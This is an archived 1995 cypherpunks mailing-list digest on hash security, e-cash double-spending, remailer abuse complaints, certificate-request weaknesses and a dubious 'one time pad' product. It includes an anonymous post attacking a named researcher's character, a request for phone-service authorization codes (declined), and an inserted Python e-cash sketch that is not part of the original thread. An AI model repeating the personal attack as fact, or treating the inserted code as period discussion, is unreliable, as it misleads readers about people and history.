http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 20 Oct 95 05:32:01 PDT
To: cypherpunks@toad.com
Subject: Re: 50 attacks... [NOISE]
In-Reply-To: <DGpCsv.9r5@sgi.sgi.com>
Message-ID: <199510201231.FAA15050@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGpCsv.9r5@sgi.sgi.com>, fc@all.net (Dr. Frederick B. Cohen) writes:

> And how secure is the hash? Is it possible to create values that will
> hash to each prime (or something else that does the job)? Is the hash
> something we can figure a way to precompute using massively parallel
> processing so that we can then provide a set of codes which will produce
> the desired results? (etc.)

Perhaps you should consider learning something about cryptography before
you cast aspersions on someone else's cryptographic protocols.

To date, MD5 appears to be a secure hash.  If you manage to find a way
to reverse it, please let us all know.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 20 Oct 95 05:50:20 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <DGq01x.ADx@sgi.sgi.com>
Message-ID: <199510201250.FAA15055@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGq01x.ADx@sgi.sgi.com>, Aleph One <aleph1@dfw.net> writes:
> On Thu, 19 Oct 1995 anonymous-remailer@shell.portal.com wrote:

>> >   NETSCAPE CLIENT APIS (NCAPIS) 2.0

>> Generally, we don't routinely trust every other computer, foreign or 
>> domestic on the Internet to manipulate us by remote control.  This is
>> as basic as the idea that we don't give out our PIN numbers with our 
>> banking cards to anyone who asks us.  

> Have you actually read the stuff? The NCAPIS is not on by default.
> You *must* enable it by telling it to which port to listen on.
> Furthermore Mosaic had a remote control API before Netscape did.

They can also be used only from the local machine on Windows or from any
machine your X server trusts on Unix.  Unless the attacker can control
what software is installed on the target system, there's no way for him
to use this to his advantage.  Of course, there's always the possibility
of exploiting bugs, but that's not a "flawed algorithm".

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an116512@anon.penet.fi
Date: Thu, 19 Oct 95 23:10:53 PDT
To: cypherpunks@toad.com
Subject: old doc cohen
Message-ID: <9510200559.AA12325@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


<<this post was written by me and two other people who have been watching
cohen's career for the last few years. i'm sorry for the spelling mistakes
and typos.>>

dr frederick b. cohen's frequent rants in which he expresses nothing
but contempt for everyone else in the security and crypt business
have to be understood in their context:

	he's trying to sell something.

what's he selling? who's he trying to sell it to? there are several answers.
all are partly true and taken together explain his posts pretty well.

	directly, he's trying to get us to buy his products, services,
	and books, or at least recommend them to others. it is obvious
	how setting himself up as the only one who recognizes these
	serious flaws would enhance his consulting business. he doesn't
	care about netscape or pgp. he cares about his wallet.

	indirectly, he's testing out halfbaked ideas here to better
	learn how to refute those who see through their weaknesses so that
	he'll be better prepared when he spews in more "serious" forums.
	this is a low risk place, as far as he's concerned, to make
	a fool of himself.

	socially, he's selling the idea of his own academic
	respectability. notice how he reminds us he's "dr." (look at me!
	i have a doctorate!!!) cohen. the truth is he never managed to
	get the respect of the mainstream academic and research worlds.
	he's been reduced to playing the role of victim-soothsayer. we'll all
	regret not listening to him back when we had the chance, one of these
	days. look at the reaction to his "seminal work" on viruses for
	a great example of how the real research world yawns at him to
	understand why this is so important to him. he feels cheated out
	of the respect he deserves. (he's willing not to care about his
	wallet to the extent that he gets this)

	psychologically, he's selling the idea that he's respectable to
	himself. ultimately it doesn't matter that most of us see right
	through him as long as he gets enough people listening to him to
	feed his very delicate ego. he needs us (someone, anyone,
	even us cypherpunks if that's what it takes) to love him and
	take him seriously.  it's very sad.

let's just ignore him. he'll find somewhere else to play (he always does).
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 20 Oct 95 07:05:01 PDT
To: cypherpunks@toad.com
Subject: Re: Polymorphic e-cash schemes was: digital cash and identity disclosure
In-Reply-To: <199510192001.OAA25866@nag.cs.colorado.edu>
Message-ID: <199510201403.HAA24730@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Bryce <wilcoxb@nag.cs.colorado.edu> writes:

>Perhaps a similar "polymorphism" could be implemented with regard to
>on-line/off-line clearing.  When you as a payee receive a Chaumian
>Ecash coin, you can choose based on several factors (including
>reputation of the payer if he chooses to make his nym known to you,
>size of the transaction, time of day, or whatever) to either accept it
>immediately and credit the payer with whatever it is you are selling,
>or to delay completion of the transaction while you attempt to deposit
>the coin with your e-bank.  (If you are wary of "payee-ID proof
>stings" like Lucky Green is, then you can go ahead and launder your
>coin through an anon account during this interval...)  If your payer
>has already spent this coin, then the bank will inform you immediately
>and you can cancel the transaction.  (And take whatever other actions
>you consider appropriate...)

Unfortunately, in order for a coin to be POTENTIALLY spent in an off-line
way, the protocols require that the identity of the withdrawer be
embedded, in blinded form, within the coin data.  It is this step that
Tim and others object to, because among other things it requires
participants to securely identify themselves to the bank, hence does not
work well in a fully anonymous society.  The reason for this requirement
is that if the coin is double-spent, this is not found out until
afterwards, and so the identity of the cheater has to be available so the
bank can go after him.

So letting the payee choose whether to deposit the coin right away or
wait until later will not address this basic privacy problem with offline
cash.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Fri, 20 Oct 95 04:41:27 PDT
To: cypherpunks@toad.com
Subject: PGP interface for Mac--well...
Message-ID: <v02120d01acad01856cab@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone seen this yet? The only upload I've seen, on info-Mac,
unbinhexes into something called "My Preschool Demo," and that's pretty
much what it is.

http://hyperarchive.lcs.mit.edu/HyperArchive/Archive/cmp/mac-pgp-control-10b1-as.hqx


From ~/mac-pgp-control-10b1-as.hqx.abs

>Abstract of INFO-MAC archived encoded Mac binary file
>   'cmp/mac-pgp-control-10b1-as.hqx'
>  Uploaded 10/20/95   250028 bytes
>
>From: raif@mpx.com.au ( Raf S. Naffah)
>Subject: MacPGP Control 1.0 Beta 1
>
>Hi there,
>
>Please find attached the first public release (Beta 1) of the MacPGP
>Control application.
>
>MacPGP Control (or MPGPC for short) is an AppleScript application --written
>in AppleScript English dialect and FaceSpan 2.0.1-- that offers an
>easy-to-use, more Macintosh friendly user interface to MacPGP.
>
>The main features of MPGPC are:
>
>1. [Mac]PGP related features:
>* Allows definition and use of nicknames for Users and Groups recipients.
>* Offers more control for keyring related actions, through a true Macintosh
>Human Interface and -in some cases- direct manipulation of keyring file
>data, including: editing trust flag byte, enabling/disabling, extracting,
>checking, certifying, fingerprinting, and forcing Warn-Only bits.
>* Secure clean clear-signed PGP ciphers, through the implementation of
>features such as: expanding tabs, transliterating non-USASCII characters,
>and word-wrapping lines before processing and handing over to email
>application.
>* Allows viewing of PGP packets for educational and debugging purposes.
>* Allows opaque signing (asciified clear-signed text)
>* Supports (low-level) and use HTTP for PGP Keyserver query and update of
>public key information.
>* Transparent use of user's UserIDs found in his/her secret keyring file.
>* Allows encryption for multiple recipients.
>* Generates Key Revocation Certificates.
>
>2. Eudora related features:
>* Supports latest Eudora versions (2.1.3/1.5.3) known to break certain scripts.
>* User-configurable Auto Move PGP messages to designated mailbox.
>* User-configurable Auto Decrypt source data before processing.
>
>3. Macintosh related features:
>* Handles encrypting/decrypting messages larger than 32K internally, while
>allowing editing of the top/first 32K chunk.
>* Extensive support of drag-and-drop.
>* Documented handlers calls for use by other scripters.
>
>To run MPGPC you need:
>
>1. The Scriptable Finder,
>2. Geneva font family,
>3. MacPGP (tested with the 2.6ui and 2.6.2 versions),
>4. The following additional extensions should be in the Extensions folder
>inside the System Folder:
>   * AppleScript,
>   * FaceSpan Extension v2.0.1, which lives on
>   <ftp://199.72.251.93//pub/sdu/FaceSpan/FaceSpanext20.sea.hqx>
>5. The following osaxen which should be part of the standard distribution
>of the Scriptable Finder, and which should reside in the Scripting
>Additions folder inside the Extensions folder:
>   * Choose File,
>   * Display Dialog,
>   * File Commands,
>   * Load Script,
>   * New File,
>   * Numerics,
>   * programmer's tool,
>   * Read/Write Commands,
>   * Store Script,
>   * String Commands.
>
>MPGPC is a freeware.
>
>cheers;






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 20 Oct 95 07:55:08 PDT
To: cypherpunks@toad.com
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
In-Reply-To: <acac7cd8430210046e54@[205.199.118.202]>
Message-ID: <199510201453.HAA06104@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


To add some background, here are two recent complaints which I received.
They give some of the flavor of what people object to:

> Please do not allow any more anonymous postings from your site to the
> Technical Writer's list.  I don't see any reason we should waste time on
> messages from people we cannot respond to.  One of the rules of the list is
> that MOST discussions are conducted "offline," with the list strictly
> reserved for topics of Technical Writers' interest.  Anonymous postings do
> not allow this to proceed.
> 
> I am angered when I see the message "THE PORTAL SYSTEM DOES NOT CONDONE OR
> APPROVE OF THE CONTENTS OF THIS POSTING."  I think this is irresponsible
> net behavior.  It is liable to cause you service trouble when your site is
> inevitably spammed by angry EMailers and newsgroup readers from all over
> the world.


> Dear Sir,
> 
> I recently received some mail through "anonymous-remailer@shell.portal.com" 
> from a sick person that probably has (had) problems with the way I behave, 
> and says he (or she?) means that my life has to be terminated. I do NOT 
> approve of these kind of messages, and I also do not approve of your service 
> to make these kinds of threats possible. I demand that you take action to 
> trace and stop these messages, and I will make it my business to have these 
> kinds of services banned from the Internet.
> 
> yours sincerely,
> <...>

These messages show that most people are unfamiliar with the notion of
anonymous remailers.  Their first exposure to the idea is when they get
some objectionable anonymous mail.  So to the extent that the problem is
to be solved by education, we would have a very long row to hoe.

Fortunately, the vast majority of such complaints can be dealt with by
blocking the addresses of the people complaining from receiving future
anonymous mail.  This almost always satisfies people.

The idea of making people ask to receive anonymous mail is interesting.
It would not seem to apply to newsgroups and/or mailing lists, but for
individuals it might work.  The remailer would have to be able to
distinguish between "end users" and other remailers in order to know
whether it was just one step in a chain or the last step.  (We can't
depend on the sender to tell us that since it is abusive or harassing
mail which will cause the problems, and senders of such mail would
presumably have incentive to get it delivered.)

It would require somewhat greater resources on the part of the remailer
to hold the messages.  I would guess from experience that a large
fraction of the messages would never be picked up, although my
perceptions may be biased since I only see bounced, poorly formatted, or
complained-about mail, and these categories probably have a larger
fraction of messages from clueless and obnoxious people.  But certainly
the messed-up messages I do see are mostly flames, "guess who's", and
similar worthless junk.  I hope there are some pearls going through that
I never see, but that is just a matter of faith.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Fri, 20 Oct 95 07:32:10 PDT
To: cypherpunks@toad.com
Subject: Denver area meeting, SUNDAY, 10/22, 2 pm
Message-ID: <n86hwkkAsycD085yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As usual, we'll congregate in the food court in the basement of the
Tivoli, and probably wander to a nearby restaurant when we have a
quorum.  I'll try to remember to bring my newly acquired copy of
_SOLVING CIPHER PROBLEMS, Cryptanalysis, Probabilities, and Diagnostics_,
by Frank W. Lewis, for perusal by anyone interested in classical
cryptanalysis.  Email for directions, additional info, etc.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 20 Oct 95 08:45:50 PDT
To: cypherpunks@toad.com
Subject: Verisign and MITM
Message-ID: <199510201540.IAA11523@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I recently submitted a certificate request to Verisign for my
SSL web server. Looking over the process, I don't see how it avoids
MITM in any way.

The process:

A) I send to netscape-cert@versign.com the email address and phone
number of my webmaster (me) along with the cert request, generated
using SSLeay's 'req' utility.

B) I fax to Verisign a request letter saying "I have a right to use
the name Community ConneXion, etc." and proof of right to use
name. (Berkeley biz license and Alameda Cty. fictitious bizname
statement, in my case.)

C) I snail mail them the same thing.


	I don't see any mechanism in place to avoid an MITM subverting
step (A), and putting in his cert request in there. There isn't a
strong cryptographic unforgeable relationship between my
usmail/fax/proof request and the emailed kx509 cert request.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 20 Oct 95 09:01:11 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Postscript in Netscape
Message-ID: <199510201600.JAA02009@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:56 AM 10/18/95 -0400, Dr. Frederick B. Cohen wrote:
> WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
> be secure - regardless of the user's use of their product.  Otherwise,
> the ads should read:

Warning:  This bullet proof vest will not protect you if you take it
off and stand in front of a gun.

If you download a virus infested executable using netscape and 
execute it, what do you expect?

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 20 Oct 95 08:55:50 PDT
To: mhw@wittsend.com
Subject: Re: Postscript and 50 ways [MAJOR NOISE] [long]
Message-ID: <9510201551.AA15270@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain



I too had to put up with Dr. Fred on the firewalls list.  I don't see what
you hoped to accomplish by posting this off-topic mean spirited stuff to
cypherpunks though.  There are many others here that are also on firewalls,
and we've let Dr. Fred speak for himself.  Everyone has already formed the
opinions they'll likely have, and it seems the only purpose of your tirade
is to mean-spiritedly kick a man when he's down.  It doesn't reflect well
on you, it wastes our time, and is a bit sickening.  Were you one of the
people making the geek dance in high school too?  I really wish you'd 
apologise to the list for this crap.  We're here to discuss cypercoolness,
not flame people, (whether they might seem to invite it or not).  Lately
this list has turned into a flame the geek list.  It's not quite the fun 
it once was, and it's embarrassing to watch.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 20 Oct 95 08:53:41 PDT
To: cypherpunks@toad.com
Subject: Re: digital cash and identity disclosure
In-Reply-To: <DGqtsp.1L@sgi.sgi.com>
Message-ID: <199510201553.IAA15162@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGqtsp.1L@sgi.sgi.com>, Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif ) writes:

> Scott Brickner writes:
>> Andreas Bogk writes:
>>> But as far as I got Chaum's idea, Alice would not reveal Bob's identity,
>>> but rather her own. Am I missing a point here?
>> 
>> You're right.  Tim's wrong.  Bob can't spend the money Alice gave him
>> without depositing it in the bank and getting new money issued.  Each
>> coin has "This money was issued to Alice" as an invisible imprint which
>> only shows up when two coins with the same serial number are together.

> I don't understand how this could happen? The two coins are identical
> (as I understood it from the tech background of ecash). what has a double-
> spended coin what a copied single-spended coin not has?

> Forgive if I missed relevant postings to this subject since I only read
> parts from the list offline.

The process of spending a coin is not simply that of transferring data.
There is a complicated protocol in which Alice decrypts some of the
identity information in the coin.  Let's say that Alice spends the coin
twice, once with Bob and again with Chuck.  Bob and Chuck can pool the
information they got from Alice and reconstruct her identity.  Alice
can't just give them both the same information because the receiver is
the one who determines what information is decrypted.  For a more
detailed explanation, check out Schneier's book.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com
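
[Added example, not part of the original message.] The double-spend identity mechanism discussed above and in Hal's earlier reply, as a simplified Python sketch: it uses hash commitments in place of the blinded, bank-signed coin data and omits the withdrawal protocol entirely. All names, the pair count K and the sample identity are assumptions made for illustration.

```python
import hashlib
import secrets

K = 16  # identity pairs per coin (assumed value)


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _commit(value, nonce):
    """Hash commitment to one identity half."""
    return hashlib.sha256(nonce + value).digest()


def withdraw(identity, k=K):
    """Build a coin holding k pairs (L_i, R_i) with L_i XOR R_i == identity.

    Returns (public_coin, secret_openings). Each half alone is uniformly
    random, so opening one half per pair says nothing about the identity.
    """
    secret, commitments = [], []
    for _ in range(k):
        left = secrets.token_bytes(len(identity))
        right = _xor(left, identity)
        nl, nr = secrets.token_bytes(16), secrets.token_bytes(16)
        secret.append(((left, nl), (right, nr)))
        commitments.append((_commit(left, nl), _commit(right, nr)))
    public = {"serial": secrets.token_hex(8), "commitments": commitments}
    return public, secret


def spend(secret, challenge):
    """Payer answers the payee's challenge bits: 0 opens L_i, 1 opens R_i."""
    return [(bit, *secret[i][bit]) for i, bit in enumerate(challenge)]


def verify_spend(public, transcript):
    """Payee (or bank) checks every opened half against its commitment."""
    commitments = public["commitments"]
    if len(transcript) != len(commitments):
        return False
    return all(
        bit in (0, 1) and _commit(value, nonce) == commitments[i][bit]
        for i, (bit, value, nonce) in enumerate(transcript)
    )


def recover_identity(t1, t2):
    """Combine two transcripts of the same coin.

    Where the challenge bits differ, both halves of a pair are exposed and
    their XOR is the withdrawer's identity. Identical challenges (one
    transcript copied and deposited twice) expose nothing new.
    """
    for (b1, v1, _), (b2, v2, _) in zip(t1, t2):
        if b1 != b2:
            return _xor(v1, v2)
    return None


class Bank:
    def __init__(self):
        self.seen = {}  # serial -> first transcript deposited

    def deposit(self, public, transcript):
        if not verify_spend(public, transcript):
            return ("rejected", None)
        earlier = self.seen.get(public["serial"])
        if earlier is None:
            self.seen[public["serial"]] = transcript
            return ("accepted", None)
        identity = recover_identity(earlier, transcript)
        if identity is None:
            return ("duplicate-deposit", None)  # same transcript re-sent
        return ("double-spend", identity)


def demo():
    identity = b"alice/acct-0042"      # constructed sample identity
    public, secret = withdraw(identity)
    bob = [0, 1] * (K // 2)            # Bob's challenge bits (constructed)
    chuck = [0, 0, 1, 1] * (K // 4)    # Chuck's challenge bits (constructed)
    bank = Bank()
    results = [
        bank.deposit(public, spend(secret, bob)),    # first spend
        bank.deposit(public, spend(secret, bob)),    # copied transcript
        bank.deposit(public, spend(secret, chuck)),  # second, distinct spend
    ]
    return identity, results


if __name__ == "__main__":
    for outcome in demo()[1]:
        print(outcome)
```

Because each payee picks the challenge bits, two independent spends of one coin agree on every bit only with probability 2^-K, which is why the receiver, not the payer, must choose what is opened.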




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 20 Oct 95 06:10:34 PDT
To: cypherpunks@toad.com
Subject: Dr. Fred
Message-ID: <v02120d00acad4ea0664f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


While Dr. Fred may have a (diminishing) few defenders left on this list, I
have found that <Plonk!>ing him was useful, at least until his latest
series of trolls stirred up the unaware.

I agree with the people who say that if he's ignored, he'll go away. After
all, it has worked before, yes?

Prove to me it won't work. ;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Thu, 19 Oct 95 21:06:01 PDT
To: dwa@corsair.com (Dana W. Albrecht)
Subject: Re: airport security
In-Reply-To: <199510191930.MAA28188@elmos.corsair.com>
Message-ID: <199510192305.AA20608@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>I've flown twice since then (on SouthWest), without being asked for any
>identification.

In Australia security is quite lax. I regularly travel under assumed names on
planes, trains and buses. You can pay with cash and be completely anonymous.
The only time it has been noticed by anyone was when a friend asked who the
"John Smith" was on my ticket. No company has worried about it.

I figure if I die and burn in a crash then what do I care if they can ID me or
not. There are worse things in life than being buried as John Doe. Those with
religious beliefs may take issue with that. But then, is a True Name your
birth name, your christened name, your legal name or your magick name.
Let "god" sort it out.

Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Fri, 20 Oct 95 07:19:00 PDT
To: John McGough <cypherpunks@toad.com>
Subject: Re: 1(800)MY-ANI-IS
Message-ID: <01HWNRFIK5LE90NDZC@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Date: Friday, 20-Oct-95 07:58 AM

From: John McGough             \ Internet:    (john.mcgough@mail.industry.net)
To:   amp                      \ Internet:    (alan.pugh@internetmci.com)

Subject: 1(800)MY-ANI-IS

JM> Looks like MCI is looking for an authorization code during that
JM> tone.  Do you have any idea how many digits is standard on their
JM> stuff?   Or better yet, if you figure it out, please let me know. 
JM> I'll do the same.
 
while i wouldn't be at liberty to get you a valid code, (i'm not sure
of the number of digits it wants as i haven't gotten mine yet), i
would suggest you call one of mci's customer service centers and
_politely_ request that they allow access to this service to non-mci
employees. i would suggest that they put some kind of message on the
number before they give you the ani like "this service provided by
mci." i would see this as a good public relations tactic for the
company for telecom-type folx who would be using it.

my 2 cents.

unfortunately, i don't speak for my company.

amp
<0003701548@mcimail.com>
<alan.pugh@internetmci.com>
PGP Key = 4A2683C1
PGP FP = A7 97 70 0F E2 5B 95 7C DB 7C 2B BF 0F E1 69 1D
October 20, 1995   10:11

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif )
Date: Fri, 20 Oct 95 02:34:18 PDT
To: wilcoxb@nag.cs.colorado.edu
Subject: Re: digital cash and identity disclosure
Message-ID: <9510200933.AA02681@PrakInf.TU-Ilmenau.DE>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner writes:
>Andreas Bogk writes:
>>But as far as I got Chaum's idea, Alice would not reveal Bob's identity,
>>but rather her own. Am I missing a point here?
>
>You're right.  Tim's wrong.  Bob can't spend the money Alice gave him
>without depositing it in the bank and getting new money issued.  Each
>coin has "This money was issued to Alice" as an invisible imprint which
>only shows up when two coins with the same serial number are together.

I don't understand how this could happen? The two coins are identical
(as I understood it from the tech background of ecash). what has a double-
spended coin what a copied single-spended coin not has?

Forgive if I missed relevant postings to this subject since I only read
parts from the list offline.


read you later  -  Holger Reif
http://remus.prakinf.tu-ilmenau.de/Reif/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 20 Oct 95 03:13:54 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [META-NOISE] W3
In-Reply-To: <199510191722.KAA06757@jobe.shell.portal.com>
Message-ID: <9510201011.AA04958@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Futplex <futplex@pseudonym.com> writes:
> Meta-noise, but I don't plan to lose any sleep over this....
> Maybe I'm just too sheltered. But in a couple of years on the Net, I've only
> ever seen _one person_ write "W3" as an abbreviation for World Wide Web
> before now.

I do use W3 too, though I'm not Alice I swear ;) !
(and I doubt i'm alone)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

AK-47 $400 million in gold SEAL Team 6 nuclear Clinton Pasqua
 plutonium




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Koning               1695 <pkoning@chipcom.com>
Date: Fri, 20 Oct 95 09:02:17 PDT
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: "power one time pad"
Message-ID: <3087F1A2@mailer2>
MIME-Version: 1.0
Content-Type: text/plain



I'd be interested in reactions to the article in Network World, 10/16/95
issue, page 53.  It describes a supposed cryptosystem that sounds bogus, but
I can't make up my mind about how much is the system and how much is
the confusion of the author.

Among other things, it says that POTP "doesn't use an encryption algorithm;
instead it synchronizes random processes on two computers as they
communicate".  (I wonder if the author understands that that's just another
way to describe encryption algorithms...)  The other claim is that it
eliminates the need to manage keys.  "... there is no need for central
servers where PGP keys ... are kept".

This seems like a strange claim because of course PGP doesn't require
central servers, but more importantly, you can't do authentication without
at least one piece of keying data being established out of band.  That
could be a certification authority public key, but you need something
to get started.

Supposedly this thing was shown at Interop.  Did anyone see it, and does
the product make sense even if the article didn't?

(One thing that disturbs me about the product name is the use of the
phrase "one time pad".  Since the "random" processes are presumably
not random but rather pseudo-random, there is no one time pad involved
at all, but rather a plain old stream cypher of some sort, which may or
may not be secure in practice but cannot have the "secure from first
principles" property that real one time pad has.)

     paul
     (pkoning@chipcom.com)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Rollins <trollins@hns.com>
Date: Fri, 20 Oct 95 09:46:32 PDT
To: tcmay@got.net
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
Message-ID: <199510201646.MAA00771@dcn92.hns.com>
MIME-Version: 1.0
Content-Type: text


tcmay@got.net (Timothy C. May) wrote:

>(I was out of town most of the past few days, when the debate about this
>"Modest Proposal" happened. In reading the messages in the thread, I see a
>lot of the issues mentioned that we talked about several years ago--not that
>this is a sin to talk about issues more than once--and that led to the
>creation of "message pools" and groups like "alt.anonymous.messages". But
>some new ideas are emerging. And I have a new idea for a remailer, so this
>is turning out to be a fruitful topic! Too bad the topic has already died,
>apparently.)
>
>At 4:36 PM 10/18/95, Hal wrote:
>>Eli Brandt <eli@UX3.SP.CS.CMU.EDU> writes:
>>
>>>If you
>>>split the message into shadows, you avoid having anyone in this
>>>position.
>>
>>I think splitting the message would be OK, but then the question is who
>>is responsible for reassembling it?  If there were a "reassembly
>>server" which took such messages, assembled them, and forwarded them,
>>then we would be right back where we started from.  If the end user is
>>responsible for reassembly, then that is tantamount to voluntarily
>>agreeing to receive anonymous messages, and that is no problem.  The
>>complaints we get are virtually 100% from people who didn't want to
>>receive such messages, or see them posted.  And of course anonymous news
>>postings via shadows would also have the reassembly problem.
>
>Hal succinctly describes the conceptual flaws in many of these schemes to
>replace the "last remailer" with something else: it usually turns out that
>such replacements either don't work (forging headers) or merely shift the
>problem to another agent.
>
>The most practical short term approach is for any remailer operator feeling
>some heat to do what Hal does with his Caltech remailer: remail to a site
>less likely to cause problems. For example, bounce all messages through a
>Netherlands remailer. (Even if the NL remailers are ultimately shut down,
>using them accomplishes the practical purpose of removing the heat from
>one's self...of course, they might feel the same way and lob the message
>back to U.S. remailers!)
>
>(Leading to the "Dining Buck Passers Problem," where a message never gets
>delivered because all remailers are passing the buck by lobbing the message
>to other remailers...."Charlie on the MTA.")

There could be a risk-based message market here.  That is what the Futures
market is about: speculation and hedging (buying and selling risk). What is
a risky message in one country may be acceptable in another.


>
>
>THE ROLE OF THE "MESSENGER"
>
>But I think I have a longer term solution, one that involves a change in
>thinking about the differences between the _originator_ of a message and
>the mere _messenger_.
>
>The notion is to much more explicitly separate the functions of the
>"messenger" or "deliverer" from the "originator" or "sender." Granted, this
>is already done in the sense that a piece of e-mail goes through many
>hands. For example, Hal's message that I am responding to here has this in
>the header blocks, showing some of the "couriers" or "messengers":
>
>Return-Path: owner-cypherpunks@toad.com
>Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by you.got.net
>(8.6.9/8.6.9) with ESMTP id KAA08536 for <tcmay@got.net>; Wed, 18 Oct 1995
>10:47:24 -0700
>Received: from toad.com by relay3.UU.NET with SMTP
>        id QQzlzw04926; Wed, 18 Oct 1995 13:06:48 -0400
>Received: by toad.com id AA06207; Wed, 18 Oct 95 09:38:06 PDT
